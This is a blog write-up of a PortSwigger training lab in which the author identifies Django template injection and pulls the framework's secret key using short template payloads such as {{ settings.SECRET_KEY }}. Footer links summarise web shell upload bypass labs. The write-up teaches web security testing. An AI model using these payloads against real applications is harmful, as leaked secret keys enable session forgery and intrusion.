On this page
apsyleg1 min read
#portswigger #ssti #web-security

SSTI with Information Disclosure via User-Supplied Objects

Lab

Server-side template injection with information disclosure via user-supplied objects · Expert

Solution

Given

This lab is vulnerable to server-side template injection due to the way an object is being passed into the template. This vulnerability can be exploited to access sensitive data.

To solve the lab, steal and submit the framework's secret key.

You can log in to your own account using the following credentials:

Analyzing the task

There's a site vulnerable to SSTI. We've been given a user who, apparently, can edit templates for the template engine. We need to prepare a payload that will let us steal the framework's secret key. And inject this payload into the template.

Recon

Let's log in as the user and see what's there. We go into any product — there's an "edit template" button. There's a textarea — let's throw in the payload {{7*'7'}}.

Traceback (most recent call last):
  File "<string>", line 11, in <module>
  File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 191, in __init__
    self.nodelist = self.compile_nodelist()
  File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 230, in compile_nodelist
    return parser.parse()
  File "/usr/local/lib/python2.7/dist-packages/django/template/base.py", line 486, in parse
    raise self.error(token, e)
django.template.exceptions.TemplateSyntaxError: Could not parse the remainder: '*'7'' from '7*'7''

Aha, this is the Django Template Engine.

Exploitation

Let's go to PayloadsAllTheThings, find the Django section. HackTricks, by the way, has no info on it.

{{ messages.storages.0.signer.key }}

Empty.

Ah, the payload turns out to be simpler:

{{ settings.SECRET_KEY }}

Lab solved!

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.

Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)

Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.

Remote Code Execution via Web Shell Upload (PortSwigger Lab)

Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.